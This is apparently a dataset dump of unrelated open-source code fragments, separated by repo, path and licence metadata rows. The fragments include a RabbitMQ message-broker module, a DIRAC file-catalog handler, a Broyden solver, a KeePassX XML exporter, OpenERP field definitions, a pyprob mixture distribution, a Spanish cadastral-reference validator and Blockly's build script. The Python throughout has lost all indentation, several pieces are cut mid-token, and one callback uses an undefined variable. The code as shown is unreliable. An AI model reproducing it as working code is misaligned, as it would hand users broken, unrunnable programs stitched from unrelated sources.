if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
body = "Exchange params"
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
else:
# Send the message onto the Identify Exchange
self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
class Transformer(MessageBrokerBase):
# the transformer class - binds to the TRANSFORM_EXCHANGE, forwards to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = TRANSFORM_EXCHANGE,settings=None):
super(Transformer, self).__init__("Transformer", user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Transformer,self).on_recieve_callback(ch, method, properties, body)
self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
class NISTExtractor(MessageBrokerBase):
# the NIST extractor class - binds to the NIST_EXCHANGE, sends extracted results to the WEB_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = NIST_EXCHANGE,settings=None):
super(NISTExtractor, self).__init__("NISTExtractor", user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
# imports must be done here (not in __init__) so nu and json are in scope
import sys
import json
sys.path.append("..")
import modules.NISTutility as nu
super(NISTExtractor,self).on_recieve_callback(ch, method, properties, body)
NISTResult=nu.convertNIST(eftname,'jpg','new_i'+eftname)
self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
class MsgLog(MessageQueue):
# the logging class - binds to the fire_host
def __init__(self, user_id="guest",header={},settings=None):
super(MsgLog, self).__init__("Logger", user_id,settings=settings)
self.channel.queue_declare(queue='firehose-queue', durable=False,auto_delete=True, exclusive=True)
self.request_queue=self.queue_bind({"name":"Results"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Web"},queue_name= 'firehose-queue', routing_key='#')
#self.request_queue=self.queue_bind({"name":"Request"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Identify"},queue_name= 'firehose-queue', routing_key='#')
def on_recieve_callback(self, ch, method, properties, body):
#self.log(body)
if 'requester' in properties.headers:
self.log("from %s for %s to %s"%( properties.headers['requester'], properties.headers['destination']['name'], properties.headers['last_node']))
self.log(str(properties.user_id))
#else:
#    self.log(str(properties))
#    self.log(str(method))
#    self.log(str(body))
def start(self, ):
self.start_consume(self.request_queue)
class Matcher(MessageBrokerBase):
# the matcher class - binds to the IDENTIFY_EXCHANGE
# undertakes match and puts return on the RESULTS_EXCHANGE queue with the routing_key of the name
def __init__(self, node_name, user_id="guest",header={},exchange_info = IDENTIFY_EXCHANGE,settings=None):
header.update({"from_node":node_name})
super(Matcher, self).__init__(node_name, user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Matcher,self).on_recieve_callback(ch, method, properties, body)
self.log('Matching '+str(properties.headers))
if 'requester' in properties.headers and not(self.node_name == properties.headers['requester']): # make sure not to match our own request
body = "Match score = %f from %s"%(random.random(),self.node_name)
self.log("doing match - sending "+body)
exchange = RESULTS_EXCHANGE
if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
self.log("my exchange is "+str(exchange))
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
class Requester(MessageQueue):
# the match request class - sends a request on the REQUEST_EXCHANGE
def __init__(self, node_name, user_id="guest",settings=None):
super(Requester, self).__init__(node_name, user_id,settings=settings)
def send(self, msg,header):
header.update({self.node_name:True,'requester':self.node_name})
super(Requester,self).send(REQUEST_EXCHANGE,msg,header,True)
class Receiver(MessageBrokerBase):
# retrieve the results from the RESULTS_EXCHANGE
def __init__(self, node_name, user_id="guest",header={},exchange_info = RESULTS_EXCHANGE,settings=None):
super(Receive
|
jmcfarlane/chula
|
chula/www/controller/__init__.py
|
Python
|
gpl-2.0
| 49 | 0 |
from chula.www.controller.base import Controller
|
zmathe/WebAppDIRAC
|
WebApp/handler/FileCatalogHandler.py
|
Python
|
gpl-3.0
| 12,082 | 0.048088 |
from WebAppDIRAC.Lib.WebHandler import WebHandler, asyncGen
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup
from DIRAC import gConfig, gLogger
from DIRAC.Core.Utilities import Time
from hashlib import md5
class FileCatalogHandler( WebHandler ):
AUTH_PROPS = "authenticated"
def __init__(self, *args, **kwargs ):
super( FileCatalogHandler, self ).__init__( *args, **kwargs )
sessionData = self.getSessionData()
self.user = sessionData['user'].get( 'username', '' )
self.group = sessionData['user'].get( 'group', '' )
self.vo = getVOForGroup( self.group )
self.fc = FileCatalog( vo = self.vo )
'''
Method to read all the available fields possible for defining a query
'''
@asyncGen
def web_getMetadataFields(self):
self.L_NUMBER = 0
self.S_NUMBER = 0
result = yield self.threadTask( self.fc.getMetadataFields )
gLogger.debug( "request: %s" % result )
if not result[ "OK" ] :
gLogger.error( "getSelectorGrid: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result["Value"]
callback = {}
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key"
gLogger.error( "getSelectorGrid: %s" % error )
self.finish({ "success" : "false" , "error" : error })
return
filemeta = result[ "FileMetaFields" ]
if len( filemeta ) > 0 :
for key , value in filemeta.items():
callback[key]= "label"
gLogger.debug( "getSelectorGrid: FileMetaFields callback %s" % callback )
dirmeta = result[ "DirectoryMetaFields" ]
if len( dirmeta ) > 0 :
for key , value in dirmeta.items():
callback[key]= value.lower()
gLogger.debug( "getSelectorGrid: Resulting callback %s" % callback )
self.finish({ "success" : "true" , "result" : callback})
'''
Method to read all the available options for a metadata field
'''
@asyncGen
def web_getQueryData( self ):
try:
compat = dict()
for key in self.request.arguments:
parts = str( key ).split(".")
if len(parts)!=3:
continue
key = str( key )
name = parts[1]
sign = parts[2]
if not len( name ) > 0:
continue
value = str( self.request.arguments[ key ][0] ).split("|")
#check existence of the 'name' section
if not compat.has_key(name):
compat[name] = dict()
#check existence of the 'sign' section
if not compat[name].has_key(sign):
if value[0]=="v":
compat[name][sign] = ""
elif value[0]=="s":
compat[name][sign] = []
if value[0]=="v":
compat[name][sign] = value[1]
elif value[0]=="s":
compat[name][sign] += value[1].split(":::")
except Exception, e:
self.finish({ "success" : "false" , "error" : "Metadata query error" })
return
path = "/"
if self.request.arguments.has_key("path") :
path = self.request.arguments["path"][0]
gLogger.always( compat )
result = yield self.threadTask( self.fc.getCompatibleMetadata, compat, path )
gLogger.always( result )
if not result[ "OK" ]:
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
self.finish({ "success" : "true" , "result" : result["Value"] })
@asyncGen
def web_getFilesData( self ) :
req = self.__request()
gLogger.always(req)
gLogger.debug( "submit: incoming request %s" % req )
result = yield self.threadTask( self.fc.findFilesByMetadataWeb, req["selection"] , req["path"] , self.S_NUMBER , self.L_NUMBER)
gLogger.debug( "submit: result of findFilesByMetadataDetailed %s" % result )
if not result[ "OK" ] :
gLogger.error( "submit: %s" % result[ "Message" ] )
self.finish({ "success" : "false" , "error" : result[ "Message" ] })
return
result = result[ "Value" ]
if not len(result) > 0:
self.finish({ "success" : "true" , "result" : [] , "total" : 0, "date":"-" })
return
total = result[ "TotalRecords" ]
result = result[ "Records" ]
callback = list()
for key , value in result.items() :
size = ""
if "Size" in value:
size = value[ "Size" ]
date = ""
if "CreationDate" in value:
date = str( value[ "CreationDate" ] )
meta = ""
if "Metadata" in value:
m = value[ "Metadata" ]
meta = '; '.join( [ '%s: %s' % ( i , j ) for ( i , j ) in m.items() ] )
dirnameList = key.split("/")
dirname = "/".join(dirnameList[:len(dirnameList)-1])
filename = dirnameList[len(dirnameList)-1:]
callback.append({"fullfilename":key, "dirname": dirname, "filename" : filename , "date" : date , "size" : size ,
"metadata" : meta })
timestamp = Time.dateTime().strftime("%Y-%m-%d %H:%M [UTC]")
self.finish({ "success" : "true" , "result" : callback , "total" : total, "date":timestamp})
def __request(self):
req = { "selection" : {} , "path" : "/" }
self.L_NUMBER = 25
if self.request.arguments.has_key( "limit" ) and len( self.request.arguments[ "limit" ][0] ) > 0:
self.L_NUMBER = int( self.request.arguments[ "limit" ][0] )
self.S_NUMBER = 0
if self.request.arguments.has_key( "start" ) and len( self.request.arguments[ "start" ][0] ) > 0:
self.S_NUMBER = int( self.request.arguments[ "start" ][0] )
result = gConfig.getOption( "/WebApp/ListSeparator" )
if result[ "OK" ] :
separator = result[ "Value" ]
else:
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "request: %s" % result[ "Message" ] )
return req
result = result["Value"]
if not result.has_key( "FileMetaFields" ):
error = "Service response has no FileMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
if not result.has_key( "DirectoryMetaFields" ):
error = "Service response has no DirectoryMetaFields key. Return empty dict"
gLogger.error( "request: %s" % error )
return req
filemeta = result[ "FileMetaFields" ]
dirmeta = result[ "DirectoryMetaFields" ]
meta = []
for key,value in dirmeta.items() :
meta.append( key )
gLogger.always( "request: metafields: %s " % meta )
for param in self.request.arguments :
tmp = str( param ).split( '.' )
if len( tmp ) != 3 :
continue
name = tmp[1]
logic = tmp[2]
value = self.request.arguments[param][0].split("|")
if not logic in ["in","nin", "=" , "!=" , ">=" , "<=" , ">" , "<" ] :
gLogger.always( "Operand '%s' is not supported " % logic )
continue
if name in meta :
#check existence of the 'name' section
if not req[ "selection" ].has_key(name):
req[ "selection" ][name] = dict()
#check existence of the 'sign' section
if not req[ "selection" ][name].has_key(logic):
if value[0]=="v":
req[ "selection" ][name][logic] = ""
elif value[0]=="s":
req[ "selection" ][name][logic] = []
if value[0]=="v":
req[ "selection" ][name][logic] = value[1]
elif value[0]=="s":
req[ "selection" ][name][logic] += value[1].split(":::")
if self.request.arguments.has_key("path") :
req["path"] = self.request.arguments["path"][0]
gLogger.always("REQ: ",req)
return req
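# Hedged illustration (added, not part of the original handler): request
# arguments are keyed "<anything>.<name>.<logic>" with values prefixed
# "v|" (scalar) or "s|" (":::"-separated list), e.g.
#   _.meta1.=  = "v|42"      -> req["selection"] == {"meta1": {"=": "42"}}
#   _.tags.in  = "s|a:::b"   -> req["selection"] == {"tags": {"in": ["a", "b"]}}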
def __request_file(self):
req = { "selection" : {} , "path" : "/" }
separator = ":::"
result = self.fc.getMetadataFields()
gLogger.debug( "request: %s" % result )
if not result["OK"]:
gLogger.error( "req
|
paulocsanz/algebra-linear
|
scripts/eq_n_linear_broyden.py
|
Python
|
agpl-3.0
| 1,262 | 0.011094 |
#!/usr/bin/env python3
from erros import NaoConverge
from numpy import matrix
from numpy.linalg import inv
from numpy.linalg import norm
def SolucaoEqNLinearBroyden(xin, bi, tol, niter, F):
xold = xin
bold = matrix(bi)
tolerancia = 1
while (tolerancia > tol and niter != -1):
f = matrix(F(xold))
if f.size == 1:
f = f.transpose()
j = bold
jinv = inv(j)
deltax = -1 * jinv * f
deltax = deltax.transpose() # transposed to perform the sum with xold
xnew = deltax + xold
deltax = deltax.transpose() # back to normal
xnew = list(xnew.flat)
y = matrix(F(xnew)) - matrix(F(xold))
bnew = bold + ((y - bold*deltax)*deltax.transpose()) / (deltax.transpose()*deltax)
tolerancia = norm(deltax) / norm(xnew)
niter -= 1
xold = xnew
bold = bnew
if niter == -1:
raise NaoConverge
return xold
if __name__ == "__main__":
F = lambda x: [[x[0] + 2 * x[1] - 2], [x[0]*x[0] + 4 * x[1]*x[1] - 4]]
try:
print(SolucaoEqNLinearBroyden([2,3], [[1,2],[4,24]], 0.0001, 100, F))
except NaoConverge:
print("Convergence not reached")
|
hozn/keepassdb
|
keepassdb/export/xml.py
|
Python
|
gpl-3.0
| 3,206 | 0.005614 |
"""
Support for exporting database to KeePassX XML format.
"""
from __future__ import absolute_import
from datetime import datetime
from xml.etree import ElementTree as ET
from xml.dom import minidom
from keepassdb import const
class XmlExporter(object):
"""
Class for exporting database to KeePassX XML format.
:ivar include_comment: Whether to include a 'generated-by' comment in the header.
:ivar prettyprint: Whether to generate pretty-printed XML (indent, etc.).
"""
include_comment = False
prettyprint = True
def __init__(self, include_comment=False, prettyprint=True):
self.include_comment = include_comment
self.prettyprint = prettyprint
def export(self, db):
"""
Export the dbnode to KeePassX XML format.
:param db: The database to export.
:type db: :class:`keepassdb.db.Database`
"""
dbnode = ET.Element('database')
if self.include_comment:
now = datetime.now()
filepath = db.filepath
if filepath:
comment = ET.Comment('Generated by keepassdb from {0} on {1}'.format(filepath, now.strftime("%c")))
else:
comment = ET.Comment('Generated by keepassdb on {0}'.format(now.strftime("%c")))
dbnode.append(comment)
def _date(dt):
if dt == const.NEVER:
return 'Never'
else:
# 2012-12-20T20:56:56
return dt.strftime('%Y-%m-%dT%H:%M:%S')
def group_to_xml(group, node):
gnode = ET.SubElement(node, 'group')
title = ET.SubElement(gnode, 'title')
title.text = group.title
icon = ET.SubElement(gnode, 'icon')
icon.text = str(group.icon)
for subgroup in group.children:
group_to_xml(subgroup, gnode)
for entry in group.entries:
if entry.title == 'Meta-Info' and entry.username == 'SYSTEM':
continue
enode = ET.SubElement(gnode, 'entry')
ET.SubElement(enode, 'title').text = entry.title
ET.SubElement(enode, 'username').text = entry.username
ET.SubElement(enode, 'password').text = entry.password
ET.SubElement(enode, 'url').text = entry.url
ET.SubElement(enode, 'comment').text = entry.notes
ET.SubElement(enode, 'icon').text = str(entry.icon)
ET.SubElement(enode, 'creation').text = _date(entry.created)
ET.SubElement(enode, 'lastaccess').text = _date(entry.accessed)
ET.SubElement(enode, 'lastmod').text = _date(entry.modified)
ET.SubElement(enode, 'expire').text = _date(entry.expires)
return gnode
for group in db.root.children:
dbnode.append(group_to_xml(group, dbnode))
xmlstr = ET.tostring(dbnode)
if self.prettyprint:
reparsed = minidom.parseString(xmlstr)
xmlstr = reparsed.toprettyxml(indent=" ")
return xmlstr
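# Hedged usage sketch (illustrative, not part of the original module):
# given an already-loaded keepassdb Database instance `db`, exporting is:
#
#   xml_str = XmlExporter(include_comment=True, prettyprint=True).export(db)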
|
Codefans-fan/odoo
|
openerp/fields.py
|
Python
|
agpl-3.0
| 70,820 | 0.001525 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013-2014 OpenERP (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
""" High-level objects for fields. """
from datetime import date, datetime
from functools import partial
from operator import attrgetter
from types import NoneType
import logging
import pytz
import xmlrpclib
from openerp.tools import float_round, ustr, html_sanitize
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT
DATE_LENGTH = len(date.today().strftime(DATE_FORMAT))
DATETIME_LENGTH = len(datetime.now().strftime(DATETIME_FORMAT))
_logger = logging.getLogger(__name__)
class SpecialValue(object):
""" Encapsulates a value in the cache in place of a normal value. """
def __init__(self, value):
self.value = value
def get(self):
return self.value
class FailedValue(SpecialValue):
""" Special value that encapsulates an exception instead of a value. """
def __init__(self, exception):
self.exception = exception
def get(self):
raise self.exception
def _check_value(value):
""" Return `value`, or call its getter if `value` is a :class:`SpecialValue`. """
return value.get() if isinstance(value, SpecialValue) else value
def resolve_all_mro(cls, name, reverse=False):
""" Return the (successively overridden) values of attribute `name` in `cls`
in mro order, or inverse mro order if `reverse` is true.
"""
klasses = reversed(cls.__mro__) if reverse else cls.__mro__
for klass in klasses:
if name in klass.__dict__:
yield klass.__dict__[name]
class MetaField(type):
""" Metaclass for field classes. """
by_type = {}
def __init__(cls, name, bases, attrs):
super(MetaField, cls).__init__(name, bases, attrs)
if cls.type:
cls.by_type[cls.type] = cls
# compute class attributes to avoid calling dir() on fields
cls.column_attrs = []
cls.related_attrs = []
cls.description_attrs = []
for attr in dir(cls):
if attr.startswith('_column_'):
cls.column_attrs.append((attr[8:], attr))
elif attr.startswith('_related_'):
cls.related_attrs.append((attr[9:], attr))
elif attr.startswith('_description_'):
cls.description_attrs.append((attr[13:], attr))
class Field(object):
""" The field descriptor contains the field definition, and manages accesses
and assignments of the corresponding field on records. The following
attributes may be provided when instantiating a field:
:param string: the label of the field seen by users (string); if not
set, the ORM takes the field name in the class (capitalized).
:param help: the tooltip of the field seen by users (string)
:param readonly: whether the field is readonly (boolean, by default ``False``)
:param required: whether the value of the field is required (boolean, by
default ``False``)
:param index: whether the field is indexed in database (boolean, by
default ``False``)
:param default: the default value for the field; this is either a static
value, or a function taking a recordset and returning a value
:param states: a dictionary mapping state values to lists of UI attribute-value
pairs; possible attributes are: 'readonly', 'required', 'invisible'.
Note: Any state-based condition requires the ``state`` field value to be
available on the client-side UI. This is typically done by including it in
the relevant views, possibly made invisible if not relevant for the
end-user.
:param groups: comma-separated list of group xml ids (string); this
restricts the field access to the users of the given groups only
:param bool copy: whether the field value should be copied when the record
is duplicated (default: ``True`` for normal fields, ``False`` for
``one2many`` and computed fields, including property fields and
related fields)
:param string oldname: the previous name of this field, so that ORM can rename
it automatically at migration
.. _field-computed:
.. rubric:: Computed fields
One can define a field whose value is computed instead of simply being
read from the database. The attributes that are specific to computed
fields are given below. To define such a field, simply provide a value
for the attribute `compute`.
:param compute: name of a method that computes the field
:param inverse: name of a method that inverses the field (optional)
:param search: name of a method that implement search on the field (optional)
:param store: whether the field is stored in database (boolean, by
default ``False`` on computed fields)
The methods given for `compute`, `inverse` and `search` are model
methods. Their signature is shown in the following example::
upper = fields.Char(compute='_compute_upper',
inverse='_inverse_upper',
search='_search_upper')
@api.depends('name')
def _compute_upper(self):
for rec in self:
self.upper = self.name.upper() if self.name else False
def _inverse_upper(self):
for rec in self:
self.name = self.upper.lower() if self.upper else False
def _search_upper(self, operator, value):
if operator == 'like':
operator = 'ilike'
return [('name', operator, value)]
The compute method has to assign the field on all records of the invoked
recordset. The decorator :meth:`openerp.api.depends` must be applied on
the compute method to specify the field dependencies; those dependencies
are used to determine when to recompute the field; recomputation is
automatic and guarantees cache/database consistency. Note that the same
method can be used for several fields, you simply have to assign all the
given fields in the method; the method will be invoked once for all
those fields.
By default, a computed field is not stored to the database, and is
computed on-the-fly. Adding the attribute ``store=True`` will store the
field's values in the database. The advantage of a stored field is that
searching on that field is done by the database itself. The disadvantage
is that it requires database updates when the field must be recomputed.
The inverse method, as its name says, does the inverse of the compute
method: the invoked records have a value for the field, and you must
apply the necessary changes on the field dependencies such that the
computation gives the expected value. Note that a computed field without
an inverse method is readonly by default.
The search method is invoked when processing domains before doing an
act
|
probprog/pyprob
|
pyprob/distributions/mixture.py
|
Python
|
bsd-2-clause
| 3,418 | 0.002048 |
import torch
from . import Distribution, Categorical
from .. import util
class Mixture(Distribution):
def __init__(self, distributions, probs=None):
self._distributions = distributions
self.length = len(distributions)
if probs is None:
self._probs = util.to_tensor(torch.zeros(self.length)).fill_(1./self.length)
else:
self._probs = util.to_tensor(probs)
self._probs = self._probs / self._probs.sum(-1, keepdim=True)
self._log_probs = torch.log(util.clamp_probs(self._probs))
event_shape = torch.Size()
if self._probs.dim() == 1:
batch_shape = torch.Size()
self._batch_length = 0
elif self._probs.dim() == 2:
batch_shape = torch.Size([self._probs.size(0)])
self._batch_length = self._probs.size(0)
else:
raise ValueError('Expecting a 1d or 2d (batched) mixture probabilities.')
self._mixing_dist = Categorical(self._probs)
self._mean = None
self._variance = None
super().__init__(name='Mixture', address_suffix='Mixture({})'.format(', '.join([d._address_suffix for d in self._distributions])), batch_shape=batch_shape, event_shape=event_shape)
def __repr__(self):
return 'Mixture(distributions:({}), probs:{})'.format(', '.join([repr(d) for d in self._distributions]), self._probs)
def __len__(self):
return self.length
def log_prob(self, value, sum=False):
if self._batch_length == 0:
value = util.to_tensor(value).squeeze()
lp = torch.logsumexp(self._log_probs + util.to_tensor([d.log_prob(value) for d in self._distributions]), dim=0)
else:
value = util.to_tensor(value).view(self._batch_length)
lp = torch.logsumexp(self._log_probs + torch.stack([d.log_prob(value).squeeze(-1) for d in self._distributions]).view(-1, self._batch_length).t(), dim=1)
return torch.sum(lp) if sum else lp
def sample(self):
if self._batch_length == 0:
i = int(self._mixing_dist.sample())
return self._distributions[i].sample()
else:
indices = self._mixing_dist.sample()
dist_samples = []
for d in self._distributions:
sample = d.sample()
if sample.dim() == 0:
sample = sample.unsqueeze(-1)
dist_samples.append(sample)
ret = []
for b in range(self._batch_length):
i = int(indices[b])
ret.append(dist_samples[i][b])
return util.to_tensor(ret)
@property
def mean(self):
if self._mean is None:
means = torch.stack([d.mean for d in self._distributions])
if self._batch_length == 0:
self._mean = torch.dot(self._probs, means)
else:
self._mean = torch.diag(torch.mm(self._probs, means))
return self._mean
@property
def variance(self):
if self._variance is None:
variances = torch.stack([(d.mean - self.mean).pow(2) + d.variance for d in self._distributions])
if self._batch_length == 0:
self._variance = torch.dot(self._probs, variances)
else:
self._variance = torch.diag(torch.mm(self._probs, variances))
return self._variance
|
holvi/python-stdnum
|
stdnum/es/referenciacatastral.py
|
Python
|
lgpl-2.1
| 4,360 | 0 |
# referenciacatastral.py - functions for handling Spanish real estate ids
# coding: utf-8
#
# Copyright (C) 2016 David García Garzón
# Copyright (C) 2016-2017 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""
Referencia Catastral (Spanish real estate property id)
The cadastral reference code is an identifier for real estate in Spain. It is
issued by Dirección General del Catastro (General Directorate of Land
Registry) of the Ministerio de Hacienda (Treasury Ministry).
It has 20 digits and contains numbers and letters including the Spanish Ñ.
The number consists of 14 digits for the parcel, 4 for identifying properties
within the parcel and 2 check digits. The parcel digits are structured
differently for urban, non-urban or special (infrastructure) cases.
More information:
* http://www.catastro.meh.es/esp/referencia_catastral_1.asp (Spanish)
* http://www.catastro.meh.es/documentos/05042010_P.pdf (Spanish)
* https://es.wikipedia.org/wiki/Catastro#Referencia_catastral
>>> validate('7837301-VG8173B-0001 TT') # Lanteira town hall
'7837301VG8173B0001TT'
>>> validate('783301 VG8173B 0001 TT') # missing digit
Traceback (most recent call last):
...
InvalidLength: ...
>>> validate('7837301/VG8173B 0001 TT') # not alphanumeric
Traceback (most recent call last):
...
InvalidFormat: ...
>>> validate('7837301 VG8173B 0001 NN') # bad check digits
Traceback (most recent call last):
...
InvalidChecksum: ...
>>> format('4A08169P03PRAT0001LR') # BCN Airport
'4A08169 P03PRAT 0001 LR'
"""
from stdnum.exceptions import *
from stdnum.util import clean
alphabet = u'ABCDEFGHIJKLMNÑOPQRSTUVWXYZ0123456789'
def compact(number):
"""Convert the number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
return clean(number, ' -').strip().upper()
def format(number):
"""Reformat the passed number to the standard format."""
number = compact(number)
return ' '.join([
number[:7],
number[7:14],
number[14:18],
number[18:]
])
# The check digit implementation is based on the Javascript
# implementation by Vicente Sancho that can be found at
# http://trellat.es/validar-la-referencia-catastral-en-javascript/
def _check_digit(number):
"""Calculate a single check digit on the provided part of the number."""
weights = (13, 15, 12, 5, 4, 17, 9, 21, 3, 7, 1)
s = sum(w * (int(n) if n.isdigit() else alphabet.find(n) + 1)
for w, n in zip(weights, number))
return 'MQWERTYUIOPASDFGHJKLBZX'[s % 23]
def _force_unicode(number):
"""Convert the number to unicode."""
if not hasattr(number, 'isnumeric'): # pragma: no cover (Python 2 code)
number = number.decode('utf-8')
return number
def calc_check_digits(number):
"""Calculate the check digits for the number."""
number = _force_unicode(compact(number))
return (
_check_digit(number[0:7] + number[14:18]) +
_check_digit(number[7:14] + number[14:18]))
def validate(number):
"""Checks to see if the number provided is a valid Cadastral Reference.
This checks the length, formatting and check digits."""
number = compact(number)
n = _force_unicode(number)
if not all(c in alphabet for c in n):
raise InvalidFormat()
if len(n) != 20:
raise InvalidLength()
if calc_check_digits(n) != n[18:]:
raise InvalidChecksum()
return number
def is_valid(number):
"""Checks to see if the number provided is a valid Cadastral Reference."""
try:
return bool(validate(number))
except ValidationError:
return False
|
kesl-scratch/PopconBot
|
scratch-blocks/build.py
|
Python
|
mit
| 18,550 | 0.007978 |
#!/usr/bin/python2.7
# Compresses the core Blockly files into a single JavaScript file.
#
# Copyright 2012 Google Inc.
# https://developers.google.com/blockly/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script generates two versions of Blockly's core files:
# blockly_compressed.js
# blockly_uncompressed.js
# The compressed file is a concatenation of all of Blockly's core files which
# have been run through Google's Closure Compiler. This is done using the
# online API (which takes a few seconds and requires an Internet connection).
# The uncompressed file is a script that loads in each of Blockly's core files
# one by one. This takes much longer for a browser to load, but is useful
# when debugging code since line numbers are meaningful and variables haven't
been renamed. The uncompressed file also allows for a faster development
# cycle since there is no need to rebuild or recompile, just reload.
#
# This script also generates:
# blocks_compressed.js: The compressed common blocks.
# blocks_horizontal_compressed.js: The compressed Scratch horizontal blocks.
# blocks_vertical_compressed.js: The compressed Scratch vertical blocks.
# msg/js/<LANG>.js for every language <LANG> defined in msg/js/<LANG>.json.
import sys
if sys.version_info[0] != 2:
raise Exception("Blockly build only compatible with Python 2.x.\n"
"You are using: " + sys.version)
import errno, glob, httplib, json, os, re, subprocess, threading, urllib
def import_path(fullpath):
"""Import a file with full path specification.
Allows one to import from any directory, something __import__ does not do.
Args:
fullpath: Path and filename of import.
Returns:
An imported module.
"""
path, filename = os.path.split(fullpath)
filename, ext = os.path.splitext(filename)
sys.path.append(path)
module = __import__(filename)
reload(module) # Might be out of date.
del sys.path[-1]
return module
HEADER = ("// Do not edit this file; automatically generated by build.py.\n"
"'use strict';\n")
class Gen_uncompressed(threading.Thread):
"""Generate a JavaScript file that loads Blockly's raw files.
Runs in a separate thread.
"""
def __init__(self, search_paths, vertical):
threading.Thread.__init__(self)
self.search_paths = search_paths
self.vertical = vertical
def run(self):
if self.vertical:
target_filename = 'blockly_uncompressed_vertical.js'
else:
target_filename = 'blockly_uncompressed_horizontal.js'
f = open(target_filename, 'w')
f.write(HEADER)
f.write("""
var isNodeJS = !!(typeof module !== 'undefined' && module.exports &&
typeof window === 'undefined');
if (isNodeJS) {
var window = {};
require('../closure-library/closure/goog/bootstrap/nodejs');
}
window.BLOCKLY_DIR = (function() {
if (!isNodeJS) {
// Find name of current directory.
var scripts = document.getElementsByTagName('script');
var re = new RegExp('(.+)[\/]blockly_uncompressed(_vertical|_horizontal|)\.js$');
for (var i = 0, script; script = scripts[i]; i++) {
var match = re.exec(script.src);
if (match) {
return match[1];
}
}
alert('Could not detect Blockly\\'s directory name.');
}
return '';
})();
window.BLOCKLY_BOOT = function() {
var dir = '';
if (isNodeJS) {
require('../closure-library/closure/goog/bootstrap/nodejs');
dir = 'blockly';
} else {
// Execute after Closure has loaded.
if (!window.goog) {
alert('Error: Closure not found. Read this:\\n' +
'developers.google.com/blockly/guides/modify/web/closure');
}
dir = window.BLOCKLY_DIR.match(/[^\\/]+$/)[0];
}
""")
add_dependency = []
base_path = calcdeps.FindClosureBasePath(self.search_paths)
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
add_dependency.append(calcdeps.GetDepsLine(dep, base_path))
add_dependency = '\n'.join(add_dependency)
# Find the Blockly directory name and replace it with a JS variable.
# This allows blockly_uncompressed.js to be compiled on one computer and be
# used on another, even if the directory name differs.
m = re.search('[\\/]([^\\/]+)[\\/]core[\\/]blockly.js', add_dependency)
add_dependency = re.sub('([\\/])' + re.escape(m.group(1)) +
'([\\/]core[\\/])', '\\1" + dir + "\\2', add_dependency)
f.write(add_dependency + '\n')
provides = []
for dep in calcdeps.BuildDependenciesFromFiles(self.search_paths):
if not dep.filename.startswith(os.pardir + os.sep): # '../'
provides.extend(dep.provides)
provides.sort()
f.write('\n')
f.write('// Load Blockly.\n')
for provide in provides:
f.write("goog.require('%s');\n" % provide)
f.write("""
delete this.BLOCKLY_DIR;
delete this.BLOCKLY_BOOT;
};
if (isNodeJS) {
window.BLOCKLY_BOOT()
module.exports = Blockly;
} else {
// Delete any existing Closure (e.g. Soy's nogoog_shim).
document.write('<script>var goog = undefined;</script>');
// Load fresh Closure Library.
document.write('<script src="' + window.BLOCKLY_DIR +
'/../closure-library/closure/goog/base.js"></script>');
document.write('<script>window.BLOCKLY_BOOT();</script>');
}
""")
f.close()
print("SUCCESS: " + target_filename)
class Gen_compressed(threading.Thread):
"""Generate a JavaScript file that contains all of Blockly's core and all
required parts of Closure, compiled together.
